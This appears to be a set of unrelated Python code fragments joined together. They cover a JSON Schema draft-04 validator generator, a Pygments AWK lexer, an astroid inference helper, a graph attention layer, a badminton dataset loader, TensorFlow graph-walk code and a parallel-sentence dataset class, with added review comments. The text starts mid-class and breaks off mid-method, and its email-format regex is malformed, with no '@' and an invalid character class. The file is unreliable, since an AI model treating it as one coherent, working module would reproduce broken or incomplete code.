    FORMAT_REGEXS = {'date-time': '^\\d{4}-[01]\\d-[0-3]\\d(t|T)[0-2]\\d:[0-5]\\d:[0-5]\\d(?:\\.\\d+)?(?:[+-][0-2]\\d:[0-5]\\d|[+-][0-2]\\d[0-5]\\d|z|Z)\\Z', 'email': '^[^]+[^]+\\.[^]+\\Z', 'hostname': '^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9])\\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\\-]{0,61}[A-Za-z0-9])\\Z', 'ipv4': '^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\Z', 'ipv6': '^(?:(?:[0-9A-Fa-f]{1,4}:){6}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|::(?:[0-9A-Fa-f]{1,4}:){5}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){4}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){3}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,2}[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){2}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,3}[0-9A-Fa-f]{1,4})?::[0-9A-Fa-f]{1,4}:(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,4}[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,5}[0-9A-Fa-f]{1,4})?::[0-9A-Fa-f]{1,4}|(?:(?:[0-9A-Fa-f]{1,4}:){,6}[0-9A-Fa-f]{1,4})?::)\\Z', 'uri': '^\\w+:(\\/?\\/?)[^\\s]+\\Z'}
    def __init__(self, definition, resolver=None, formats={}, use_default=True):
        """Set up keyword dispatch for draft-04.

        ``formats`` maps custom format names to either a regex string or a
        callable; ``use_default`` enables filling in schema ``default``
        values for missing properties/items.
        NOTE(review): ``formats={}`` is a mutable default argument; harmless
        here as long as it is never mutated, but worth confirming.
        """
        super().__init__(definition, resolver)
        self._custom_formats = formats
        self._use_default = use_default
        self._json_keywords_to_function.update((('type', self.generate_type), ('enum', self.generate_enum), ('allOf', self.generate_all_of), ('anyOf', self.generate_any_of), ('oneOf', self.generate_one_of), ('not', self.generate_not), ('minLength', self.generate_min_length), ('maxLength', self.generate_max_length), ('pattern', self.generate_pattern), ('format', self.generate_format), ('minimum', self.generate_minimum), ('maximum', self.generate_maximum), ('multipleOf', self.generate_multiple_of), ('minItems', self.generate_min_items), ('maxItems', self.generate_max_items), ('uniqueItems', self.generate_unique_items), ('items', self.generate_items), ('minProperties', self.generate_min_properties), ('maxProperties', self.generate_max_properties), ('required', self.generate_required), ('dependencies', self.generate_dependencies), ('properties', self.generate_properties), ('patternProperties', self.generate_pattern_properties), ('additionalProperties', self.generate_additional_properties)))
        # Counter used to give each anyOf/oneOf occurrence a unique variable.
        self._any_or_one_of_count = 0
    def global_state(self):
        """Extend the base generator's global state with custom formats.

        NOTE(review): upstream fastjsonschema declares this as a @property
        (and it reads ``super().global_state`` as an attribute, which
        suggests the parent defines a property); the decorator may have been
        stripped from this file -- confirm against callers.
        """
        res = super().global_state
        res['custom_formats'] = self._custom_formats
        return res
    def generate_type(self):
        """Emit an isinstance() check for the 'type' keyword."""
        types = enforce_list(self._definition['type'])
        try:
            python_types = ', '.join((JSON_TYPE_TO_PYTHON_TYPE[t] for t in types))
        except KeyError as exc:
            raise JsonSchemaDefinitionException('Unknown type: {}'.format(exc))
        extra = ''
        # bool is a subclass of int in Python, so explicitly reject it for
        # number/integer schemas unless 'boolean' is also an allowed type.
        if ((('number' in types) or ('integer' in types)) and ('boolean' not in types)):
            extra = ' or isinstance({variable}, bool)'.format(variable=self._variable)
        with self.l('if not isinstance({variable}, ({})){}:', python_types, extra):
            self.exc('{name} must be {}', ' or '.join(types), rule='type')
    def generate_enum(self):
        """Emit a membership test against the 'enum' value list."""
        enum = self._definition['enum']
        if (not isinstance(enum, (list, tuple))):
            raise JsonSchemaDefinitionException('enum must be an array')
        with self.l('if {variable} not in {enum}:'):
            self.exc('{name} must be one of {}', self.e(enum), rule='enum')
    def generate_all_of(self):
        """Emit validation for every sub-schema of 'allOf' (all must pass)."""
        for definition_item in self._definition['allOf']:
            self.generate_func_code_block(definition_item, self._variable, self._variable_name, clear_variables=True)
    def generate_any_of(self):
        """Emit 'anyOf' validation: at least one sub-schema must pass.

        Each sub-schema is tried in a try/except; a counter records how many
        matched so later attempts can be skipped.
        """
        self._any_or_one_of_count += 1
        count = self._any_or_one_of_count
        self.l('{variable}_any_of_count{count} = 0', count=count)
        for definition_item in self._definition['anyOf']:
            # Stop trying alternatives as soon as one has matched.
            with self.l('if not {variable}_any_of_count{count}:', count=count, optimize=False):
                with self.l('try:', optimize=False):
                    self.generate_func_code_block(definition_item, self._variable, self._variable_name, clear_variables=True)
                    self.l('{variable}_any_of_count{count} += 1', count=count)
                self.l('except JsonSchemaValueException: pass')
        with self.l('if not {variable}_any_of_count{count}:', count=count, optimize=False):
            self.exc('{name} cannot be validated by any definition', rule='anyOf')
    def generate_one_of(self):
        """Emit 'oneOf' validation: exactly one sub-schema must pass.

        Counting stops early once two matches are seen, since that is
        already a failure.
        """
        self._any_or_one_of_count += 1
        count = self._any_or_one_of_count
        self.l('{variable}_one_of_count{count} = 0', count=count)
        for definition_item in self._definition['oneOf']:
            with self.l('if {variable}_one_of_count{count} < 2:', count=count, optimize=False):
                with self.l('try:', optimize=False):
                    self.generate_func_code_block(definition_item, self._variable, self._variable_name, clear_variables=True)
                    self.l('{variable}_one_of_count{count} += 1', count=count)
                self.l('except JsonSchemaValueException: pass')
        with self.l('if {variable}_one_of_count{count} != 1:', count=count):
            # Report how many definitions matched in the error message.
            dynamic = '" (" + str({variable}_one_of_count{}) + " matches found)"'
            self.exc('{name} must be valid exactly by one definition', count, append_to_msg=dynamic, rule='oneOf')
    def generate_not(self):
        """Emit 'not' validation: the value must NOT match the sub-schema.

        Boolean and empty-schema forms are special-cased per draft-04
        semantics.
        """
        not_definition = self._definition['not']
        if (not_definition is True):
            self.exc('{name} must not be there', rule='not')
        elif (not_definition is False):
            # 'not': false matches everything -- nothing to emit.
            return
        elif (not not_definition):
            # Empty schema matches everything, so any truthy value fails.
            with self.l('if {}:', self._variable):
                self.exc('{name} must NOT match a disallowed definition', rule='not')
        else:
            with self.l('try:', optimize=False):
                self.generate_func_code_block(not_definition, self._variable, self._variable_name)
            self.l('except JsonSchemaValueException: pass')
            # No exception means the disallowed schema matched.
            with self.l('else:'):
                self.exc('{name} must NOT match a disallowed definition', rule='not')
    def generate_min_length(self):
        """Emit 'minLength' check (applies only to strings)."""
        with self.l('if isinstance({variable}, str):'):
            self.create_variable_with_length()
            if (not isinstance(self._definition['minLength'], int)):
                raise JsonSchemaDefinitionException('minLength must be a number')
            with self.l('if {variable}_len < {minLength}:'):
                self.exc('{name} must be longer than or equal to {minLength} characters', rule='minLength')
    def generate_max_length(self):
        """Emit 'maxLength' check (applies only to strings)."""
        with self.l('if isinstance({variable}, str):'):
            self.create_variable_with_length()
            if (not isinstance(self._definition['maxLength'], int)):
                raise JsonSchemaDefinitionException('maxLength must be a number')
            with self.l('if {variable}_len > {maxLength}:'):
                self.exc('{name} must be shorter than or equal to {maxLength} characters', rule='maxLength')
    def generate_pattern(self):
        """Emit 'pattern' check using a pre-compiled regex.

        '$' anchors are rewritten to '\\Z' so they match end-of-string
        rather than before a trailing newline.
        """
        with self.l('if isinstance({variable}, str):'):
            pattern = self._definition['pattern']
            safe_pattern = pattern.replace('\\', '\\\\').replace('"', '\\"')
            end_of_string_fixed_pattern = DOLLAR_FINDER.sub('\\\\Z', pattern)
            self._compile_regexps[pattern] = re.compile(end_of_string_fixed_pattern)
            with self.l('if not REGEX_PATTERNS[{}].search({variable}):', repr(pattern)):
                self.exc('{name} must match pattern {}', safe_pattern, rule='pattern')
    def generate_format(self):
        """Emit 'format' check for custom, built-in, or 'regex' formats."""
        with self.l('if isinstance({variable}, str):'):
            format_ = self._definition['format']
            # Custom formats take priority over the built-in ones.
            if (format_ in self._custom_formats):
                custom_format = self._custom_formats[format_]
                if isinstance(custom_format, str):
                    # A string custom format is a regex.
                    self._generate_format(format_, (format_ + '_re_pattern'), custom_format)
                else:
                    # Otherwise it is a callable looked up at run time.
                    with self.l('if not custom_formats["{}"]({variable}):', format_):
                        self.exc('{name} must be {}', format_, rule='format')
            elif (format_ in self.FORMAT_REGEXS):
                format_regex = self.FORMAT_REGEXS[format_]
                self._generate_format(format_, (format_ + '_re_pattern'), format_regex)
            elif (format_ == 'regex'):
                # 'regex' format: the value itself must compile as a regex.
                with self.l('try:', optimize=False):
                    self.l('re.compile({variable})')
                with self.l('except Exception:'):
                    self.exc('{name} must be a valid regex', rule='format')
            else:
                raise JsonSchemaDefinitionException('Unknown format: {}'.format(format_))
    def _generate_format(self, format_name, regexp_name, regexp):
        """Emit a regex-based format check, compiling the regex once."""
        if (self._definition['format'] == format_name):
            if (not (regexp_name in self._compile_regexps)):
                self._compile_regexps[regexp_name] = re.compile(regexp)
            with self.l('if not REGEX_PATTERNS["{}"].match({variable}):', regexp_name):
                self.exc('{name} must be {}', format_name, rule='format')
    def generate_minimum(self):
        """Emit 'minimum' check, honoring 'exclusiveMinimum'."""
        with self.l('if isinstance({variable}, (int, float, Decimal)):'):
            if (not isinstance(self._definition['minimum'], (int, float, decimal.Decimal))):
                raise JsonSchemaDefinitionException('minimum must be a number')
            if self._definition.get('exclusiveMinimum', False):
                with self.l('if {variable} <= {minimum}:'):
                    self.exc('{name} must be bigger than {minimum}', rule='minimum')
            else:
                with self.l('if {variable} < {minimum}:'):
                    self.exc('{name} must be bigger than or equal to {minimum}', rule='minimum')
    def generate_maximum(self):
        """Emit 'maximum' check, honoring 'exclusiveMaximum'."""
        with self.l('if isinstance({variable}, (int, float, Decimal)):'):
            if (not isinstance(self._definition['maximum'], (int, float, decimal.Decimal))):
                raise JsonSchemaDefinitionException('maximum must be a number')
            if self._definition.get('exclusiveMaximum', False):
                with self.l('if {variable} >= {maximum}:'):
                    self.exc('{name} must be smaller than {maximum}', rule='maximum')
            else:
                with self.l('if {variable} > {maximum}:'):
                    self.exc('{name} must be smaller than or equal to {maximum}', rule='maximum')
    def generate_multiple_of(self):
        """Emit 'multipleOf' check.

        Float divisors go through Decimal to avoid binary floating point
        artifacts (e.g. 0.3 / 0.1).
        """
        with self.l('if isinstance({variable}, (int, float, Decimal)):'):
            if (not isinstance(self._definition['multipleOf'], (int, float, decimal.Decimal))):
                raise JsonSchemaDefinitionException('multipleOf must be a number')
            if isinstance(self._definition['multipleOf'], float):
                self.l('quotient = Decimal(repr({variable})) / Decimal(repr({multipleOf}))')
            else:
                self.l('quotient = {variable} / {multipleOf}')
            with self.l('if int(quotient) != quotient:'):
                self.exc('{name} must be multiple of {multipleOf}', rule='multipleOf')
    def generate_min_items(self):
        """Emit 'minItems' check (applies only to arrays)."""
        self.create_variable_is_list()
        with self.l('if {variable}_is_list:'):
            if (not isinstance(self._definition['minItems'], int)):
                raise JsonSchemaDefinitionException('minItems must be a number')
            self.create_variable_with_length()
            with self.l('if {variable}_len < {minItems}:'):
                self.exc('{name} must contain at least {minItems} items', rule='minItems')
    def generate_max_items(self):
        """Emit 'maxItems' check (applies only to arrays)."""
        self.create_variable_is_list()
        with self.l('if {variable}_is_list:'):
            if (not isinstance(self._definition['maxItems'], int)):
                raise JsonSchemaDefinitionException('maxItems must be a number')
            self.create_variable_with_length()
            with self.l('if {variable}_len > {maxItems}:'):
                self.exc('{name} must contain less than or equal to {maxItems} items', rule='maxItems')
    def generate_unique_items(self):
        """Emit 'uniqueItems' check.

        The generated helper 'fn' converts items to hashable, canonical
        forms (dicts to frozensets, lists to tuples, bools to strings so
        True does not collide with 1) before comparing set sizes.
        """
        unique_definition = self._definition['uniqueItems']
        if (not unique_definition):
            return
        self.create_variable_is_list()
        with self.l('if {variable}_is_list:'):
            self.l('def fn(var): return frozenset(dict((k, fn(v)) for k, v in var.items()).items()) if hasattr(var, "items") else tuple(fn(v) for v in var) if isinstance(var, (dict, list)) else str(var) if isinstance(var, bool) else var')
            self.create_variable_with_length()
            with self.l('if {variable}_len > len(set(fn({variable}_x) for {variable}_x in {variable})):'):
                self.exc('{name} must contain unique items', rule='uniqueItems')
    def generate_items(self):
        """Emit 'items' (and 'additionalItems') validation.

        Handles the three schema forms: boolean, positional list of
        sub-schemas, and a single sub-schema applied to every item.
        """
        items_definition = self._definition['items']
        if (items_definition is True):
            return
        self.create_variable_is_list()
        with self.l('if {variable}_is_list:'):
            self.create_variable_with_length()
            if (items_definition is False):
                with self.l('if {variable}:'):
                    self.exc('{name} must not be there', rule='items')
            elif isinstance(items_definition, list):
                for (idx, item_definition) in enumerate(items_definition):
                    with self.l('if {variable}_len > {}:', idx):
                        self.l('{variable}__{0} = {variable}[{0}]', idx)
                        self.generate_func_code_block(item_definition, '{}__{}'.format(self._variable, idx), '{}[{}]'.format(self._variable_name, idx))
                    # Optionally fill in missing positional items from defaults.
                    if (self._use_default and isinstance(item_definition, dict) and ('default' in item_definition)):
                        self.l('else: {variable}.append({})', repr(item_definition['default']))
                if ('additionalItems' in self._definition):
                    if (self._definition['additionalItems'] is False):
                        with self.l('if {variable}_len > {}:', len(items_definition)):
                            self.exc('{name} must contain only specified items', rule='items')
                    else:
                        # Validate items beyond the positional schemas.
                        with self.l('for {variable}_x, {variable}_item in enumerate({variable}[{0}:], {0}):', len(items_definition)):
                            count = self.generate_func_code_block(self._definition['additionalItems'], '{}_item'.format(self._variable), '{}[{{{}_x}}]'.format(self._variable_name, self._variable))
                            if (count == 0):
                                self.l('pass')
            elif items_definition:
                # Single schema applied to every item.
                with self.l('for {variable}_x, {variable}_item in enumerate({variable}):'):
                    count = self.generate_func_code_block(items_definition, '{}_item'.format(self._variable), '{}[{{{}_x}}]'.format(self._variable_name, self._variable))
                    if (count == 0):
                        self.l('pass')
    def generate_min_properties(self):
        """Emit 'minProperties' check (applies only to objects)."""
        self.create_variable_is_dict()
        with self.l('if {variable}_is_dict:'):
            if (not isinstance(self._definition['minProperties'], int)):
                raise JsonSchemaDefinitionException('minProperties must be a number')
            self.create_variable_with_length()
            with self.l('if {variable}_len < {minProperties}:'):
                self.exc('{name} must contain at least {minProperties} properties', rule='minProperties')
    def generate_max_properties(self):
        """Emit 'maxProperties' check (applies only to objects)."""
        self.create_variable_is_dict()
        with self.l('if {variable}_is_dict:'):
            if (not isinstance(self._definition['maxProperties'], int)):
                raise JsonSchemaDefinitionException('maxProperties must be a number')
            self.create_variable_with_length()
            with self.l('if {variable}_len > {maxProperties}:'):
                self.exc('{name} must contain less than or equal to {maxProperties} properties', rule='maxProperties')
    def generate_required(self):
        """Emit 'required' check via set difference against the dict's keys."""
        self.create_variable_is_dict()
        with self.l('if {variable}_is_dict:'):
            if (not isinstance(self._definition['required'], (list, tuple))):
                raise JsonSchemaDefinitionException('required must be an array')
            self.l('{variable}__missing_keys = set({required}) - {variable}.keys()')
            with self.l('if {variable}__missing_keys:'):
                dynamic = 'str(sorted({variable}__missing_keys)) + " properties"'
                self.exc('{name} must contain ', self.e(self._definition['required']), rule='required', append_to_msg=dynamic)
    def generate_properties(self):
        """Emit per-property validation.

        Validated keys are removed from the tracked key set so that
        'additionalProperties' later sees only the leftovers.  Missing
        properties may be filled from schema defaults.
        """
        self.create_variable_is_dict()
        with self.l('if {variable}_is_dict:'):
            self.create_variable_keys()
            for (key, prop_definition) in self._definition['properties'].items():
                # Sanitize the key into a valid Python identifier suffix.
                key_name = re.sub('($[^a-zA-Z]|[^a-zA-Z0-9])', '', key)
                if (not isinstance(prop_definition, (dict, bool))):
                    raise JsonSchemaDefinitionException('{}[{}] must be object'.format(self._variable, key_name))
                with self.l('if "{}" in {variable}_keys:', self.e(key)):
                    self.l('{variable}_keys.remove("{}")', self.e(key))
                    self.l('{variable}__{0} = {variable}["{1}"]', key_name, self.e(key))
                    self.generate_func_code_block(prop_definition, '{}__{}'.format(self._variable, key_name), '{}.{}'.format(self._variable_name, self.e(key)), clear_variables=True)
                if (self._use_default and isinstance(prop_definition, dict) and ('default' in prop_definition)):
                    self.l('else: {variable}["{}"] = {}', self.e(key), repr(prop_definition['default']))
    def generate_pattern_properties(self):
        """Emit 'patternProperties' validation.

        Every key is tested against every pattern; matching keys are removed
        from the tracked key set and their values validated.
        """
        self.create_variable_is_dict()
        with self.l('if {variable}_is_dict:'):
            self.create_variable_keys()
            for (pattern, definition) in self._definition['patternProperties'].items():
                self._compile_regexps[pattern] = re.compile(pattern)
            with self.l('for {variable}_key, {variable}_val in {variable}.items():'):
                for (pattern, definition) in self._definition['patternProperties'].items():
                    with self.l('if REGEX_PATTERNS[{}].search({variable}_key):', repr(pattern)):
                        with self.l('if {variable}_key in {variable}_keys:'):
                            self.l('{variable}_keys.remove({variable}_key)')
                        self.generate_func_code_block(definition, '{}_val'.format(self._variable), '{}.{{{}_key}}'.format(self._variable_name, self._variable), clear_variables=True)
    def generate_additional_properties(self):
        """Emit 'additionalProperties' validation over keys not consumed by
        'properties'/'patternProperties'."""
        self.create_variable_is_dict()
        with self.l('if {variable}_is_dict:'):
            self.create_variable_keys()
            add_prop_definition = self._definition['additionalProperties']
            if ((add_prop_definition is True) or (add_prop_definition == {})):
                return
            if add_prop_definition:
                properties_keys = list(self._definition.get('properties', {}).keys())
                with self.l('for {variable}_key in {variable}_keys:'):
                    with self.l('if {variable}_key not in {}:', properties_keys):
                        self.l('{variable}_value = {variable}.get({variable}_key)')
                        self.generate_func_code_block(add_prop_definition, '{}_value'.format(self._variable), '{}.{{{}_key}}'.format(self._variable_name, self._variable))
            else:
                # additionalProperties: false -- any leftover key is an error.
                with self.l('if {variable}_keys:'):
                    self.exc('{name} must not contain "+str({variable}_keys)+" properties', rule='additionalProperties')
    def generate_dependencies(self):
        """Emit 'dependencies' validation.

        Each dependency is either a list of required sibling keys or a
        sub-schema applied to the whole object when the trigger key exists.
        """
        self.create_variable_is_dict()
        with self.l('if {variable}_is_dict:'):
            is_empty = True
            for (key, values) in self._definition['dependencies'].items():
                if ((values == []) or (values is True)):
                    continue
                is_empty = False
                with self.l('if "{}" in {variable}:', self.e(key)):
                    if (values is False):
                        self.exc('{} in {name} must not be there', key, rule='dependencies')
                    elif isinstance(values, list):
                        for value in values:
                            with self.l('if "{}" not in {variable}:', self.e(value)):
                                self.exc('{name} missing dependency {} for {}', self.e(value), self.e(key), rule='dependencies')
                    else:
                        self.generate_func_code_block(values, self._variable, self._variable_name, clear_variables=True)
            if is_empty:
                # Keep the generated 'if' body syntactically valid.
                self.l('pass')
class AwkLexer(RegexLexer):
    """Pygments lexer for the AWK language (awk/gawk/mawk/nawk scripts)."""
    name = 'Awk'
    aliases = ['awk', 'gawk', 'mawk', 'nawk']
    filenames = ['*.awk']
    mimetypes = ['application/x-awk']
    # BUGFIX: the original line was `url = '` -- an unterminated string
    # literal (the URL text appears to have been stripped from this file),
    # which is a syntax error.  Restored to the value used by upstream
    # Pygments for this lexer.
    url = 'https://en.wikipedia.org/wiki/AWK'
    version_added = '1.5'
    # State machine: 'slashstartsregex' disambiguates `/` between division
    # and the start of a regex literal based on the preceding token.
    tokens = {'commentsandwhitespace': [('\\s+', Text), ('#.*$', Comment.Single)], 'slashstartsregex': [include('commentsandwhitespace'), ('/(\\\\.|[^[/\\\\\\n]|\\[(\\\\.|[^\\]\\\\\\n])*])+/\\B', String.Regex, '#pop'), ('(?=/)', Text, ('#pop', 'badregex')), default('#pop')], 'badregex': [('\\n', Text, '#pop')], 'root': [('^(?=\\s|/)', Text, 'slashstartsregex'), include('commentsandwhitespace'), ('\\+\\+|--|\\|\\||&&|in\\b|\\$|!?~|(\\*\\*|[-<>+*%\\^/!=|])=?', Operator, 'slashstartsregex'), ('[{(\\[;,]', Punctuation, 'slashstartsregex'), ('[})\\].]', Punctuation), ('(break|continue|do|while|exit|for|if|else|return)\\b', Keyword, 'slashstartsregex'), ('function\\b', Keyword.Declaration, 'slashstartsregex'), ('(atan2|cos|exp|int|log|rand|sin|sqrt|srand|gensub|gsub|index|length|match|split|sprintf|sub|substr|tolower|toupper|close|fflush|getline|next|nextfile|print|printf|strftime|systime|delete|system)\\b', Keyword.Reserved), ('(ARGC|ARGIND|ARGV|BEGIN|CONVFMT|ENVIRON|END|ERRNO|FIELDWIDTHS|FILENAME|FNR|FS|IGNORECASE|NF|NR|OFMT|OFS|ORFS|RLENGTH|RS|RSTART|RT|SUBSEP)\\b', Name.Builtin), ('[$a-zA-Z_]\\w*', Name.Other), ('[0-9][0-9]*\\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float), ('0x[0-9a-fA-F]+', Number.Hex), ('[0-9]+', Number.Integer), ('"(|\\\\[^\\\\]|[^"\\\\])*"', String.Double), ("'(|\\\\[^\\\\]|[^'\\\\])*'", String.Single)]}
def get_info(python=sys.executable):
    """Collect interpreter build info for *python*.

    For the current interpreter the data is gathered in-process; for any
    other interpreter this module is re-run under it and the serialized
    output is parsed back.
    """
    if not python or python == sys.executable:
        data = _get_current_info()
    else:
        import subprocess
        command = [python, __file__]
        try:
            output = subprocess.check_output(command, encoding='utf-8')
        except subprocess.CalledProcessError:
            raise Exception(f'could not get info for {python or sys.executable}')
        data = _unjsonify_info(output)
    return _build_info(data)
def infer_property(node: nodes.Call, context: (InferenceContext | None)=None) -> objects.Property:
    """Infer a ``property(...)`` call as a Property object.

    Requires at least a getter argument that infers to a function or
    lambda; otherwise falls back to default inference.
    """
    if len(node.args) < 1:
        raise UseInferenceDefault
    try:
        getter = next(node.args[0].infer(context=context))
    except (InferenceError, StopIteration) as exc:
        raise UseInferenceDefault from exc
    if not isinstance(getter, (nodes.FunctionDef, nodes.Lambda)):
        raise UseInferenceDefault
    result = objects.Property(function=getter, name=getter.name, lineno=node.lineno, col_offset=node.col_offset)
    result.parent = node
    # The property node borrows the getter's arguments and docstring.
    result.postinit(body=[], args=getter.args, doc_node=getattr(getter, 'doc_node', None))
    return result
class TransformerAttentionSepModule(nn.Module):
    """Multi-head graph attention whose aggregated message is concatenated
    with the input features ("separate" variant) before the output
    projection and dropout."""

    def __init__(self, dim, num_heads, dropout, **kwargs):
        super().__init__()
        _check_dim_and_num_heads_consistency(dim, num_heads)
        self.dim = dim
        self.num_heads = num_heads
        self.head_dim = dim // num_heads
        # Separate linear projections for queries, keys and values.
        self.attn_query = nn.Linear(in_features=dim, out_features=dim)
        self.attn_key = nn.Linear(in_features=dim, out_features=dim)
        self.attn_value = nn.Linear(in_features=dim, out_features=dim)
        # Input width is doubled because the message is concatenated with x.
        self.output_linear = nn.Linear(in_features=dim * 2, out_features=dim)
        self.dropout = nn.Dropout(p=dropout)

    def forward(self, graph, x):
        def per_head(t):
            # Split the feature dimension into (num_heads, head_dim).
            return t.reshape(-1, self.num_heads, self.head_dim)

        q = per_head(self.attn_query(x))
        k = per_head(self.attn_key(x))
        v = per_head(self.attn_value(x))
        # Scaled dot-product scores per edge, normalized per node.
        scores = ops.u_dot_v(graph, q, k) / (self.head_dim ** 0.5)
        probs = edge_softmax(graph, scores)
        message = ops.u_mul_e_sum(graph, v, probs)
        message = message.reshape(-1, self.dim)
        combined = torch.cat([x, message], axis=1)
        out = self.output_linear(combined)
        return self.dropout(out)
def prepare_predict_dataset1(args):
    """Build the prediction BadmintonDataset from cleaned match data.

    Cleans the raw matches, keeps only the rally/shot columns the model
    needs, and label-encodes the categorical `player` and `type` columns
    (codes start at 1, leaving 0 free, e.g. for padding).

    Returns a (dataset, args) tuple.
    """
    matches = DataCleaner(args)
    used_column = ['rally_id', 'player', 'type', 'player_location_x', 'player_location_y', 'opponent_location_x', 'opponent_location_y', 'ball_round', 'set', 'match_id']
    matches = matches[used_column]
    # Integer-encode categorical columns; factorize codes start at 0, so
    # shift by 1.  (The unique-value arrays were previously captured but
    # never used -- dropped as dead code.)
    matches['player'] = pd.factorize(matches['player'])[0] + 1
    print(len(matches))
    matches['type'] = pd.factorize(matches['type'])[0] + 1
    dataset = BadmintonDataset(matches, used_column, args)
    # NOTE: a seeded torch.Generator was previously created here but never
    # used anywhere; removed as dead code.
    return (dataset, args)
def get_walks_intersection_ops(forward_seed_ops, backward_seed_ops, forward_inclusive=True, backward_inclusive=True, within_ops=None, within_ops_fn=None, control_inputs=False, control_outputs=None, control_ios=None):
    """Return the ops reachable forward from *forward_seed_ops* AND
    backward from *backward_seed_ops*.

    The result preserves the forward-walk order.  See the forward/backward
    walk helpers for the meaning of the inclusive/within/control arguments.
    """
    (control_inputs, control_outputs) = check_cios(control_inputs, control_outputs, control_ios)
    forward_ops = get_forward_walk_ops(forward_seed_ops, inclusive=forward_inclusive, within_ops=within_ops, within_ops_fn=within_ops_fn, control_outputs=control_outputs)
    backward_ops = get_backward_walk_ops(backward_seed_ops, inclusive=backward_inclusive, within_ops=within_ops, within_ops_fn=within_ops_fn, control_inputs=control_inputs)
    # PERF: membership test against a set is O(1) vs O(m) against the list,
    # turning the intersection from O(n*m) into O(n+m).
    backward_set = set(backward_ops)
    return [op for op in forward_ops if op in backward_set]
class ParallelSentencesDataset(Dataset):
    """Dataset of parallel (aligned) sentences for knowledge distillation.

    Each entry pairs target sentences (tokenized for the student model)
    with the teacher model's embedding of the corresponding source
    sentence.  Datasets can be weighted via `dataset_indices` so that some
    corpora are sampled more often per epoch.
    """
    def __init__(self, student_model: SentenceTransformer, teacher_model: SentenceTransformer, batch_size: int=8, use_embedding_cache: bool=True):
        # Student tokenizes targets; teacher embeds sources.
        self.student_model = student_model
        self.teacher_model = teacher_model
        self.datasets = []            # one list of (source, targets) per corpus
        self.datasets_iterator = []   # current read position per corpus
        self.datasets_tokenized = []  # whether a corpus's targets are tokenized yet
        self.dataset_indices = []     # corpus ids repeated `weight` times
        self.copy_dataset_indices = []
        self.cache = []               # pre-generated (targets, src_embedding) pairs
        self.batch_size = batch_size
        self.use_embedding_cache = use_embedding_cache
        self.embedding_cache = {}     # sentence -> teacher embedding
        self.num_sentences = 0
    def load_data(self, filepath: str, weight: int=100, max_sentences: int=None, max_sentence_length: int=128):
        """Read a tab-separated (optionally gzipped) parallel file and add it.

        Lines where any sentence exceeds `max_sentence_length` characters are
        skipped; reading stops after `max_sentences` accepted lines.
        NOTE(review): the same length filter is applied again in add_dataset,
        so the check here is redundant but harmless.
        """
        logging.info(('Load ' + filepath))
        parallel_sentences = []
        with (gzip.open(filepath, 'rt', encoding='utf8') if filepath.endswith('.gz') else open(filepath, encoding='utf8')) as fIn:
            count = 0
            for line in fIn:
                sentences = line.strip().split('\t')
                if ((max_sentence_length is not None) and (max_sentence_length > 0) and (max([len(sent) for sent in sentences]) > max_sentence_length)):
                    continue
                parallel_sentences.append(sentences)
                count += 1
                if ((max_sentences is not None) and (max_sentences > 0) and (count >= max_sentences)):
                    break
        self.add_dataset(parallel_sentences, weight=weight, max_sentences=max_sentences, max_sentence_length=max_sentence_length)
    def add_dataset(self, parallel_sentences: List[List[str]], weight: int=100, max_sentences: int=None, max_sentence_length: int=128):
        """Register an in-memory parallel corpus.

        The first sentence of each row is the source; all sentences of the
        row (including the source itself) become its targets.  `weight`
        controls how often this corpus is drawn per generate_data() pass.
        """
        sentences_map = {}
        for sentences in parallel_sentences:
            if ((max_sentence_length is not None) and (max_sentence_length > 0) and (max([len(sent) for sent in sentences]) > max_sentence_length)):
                continue
            source_sentence = sentences[0]
            if (source_sentence not in sentences_map):
                sentences_map[source_sentence] = set()
            for sent in sentences:
                sentences_map[source_sentence].add(sent)
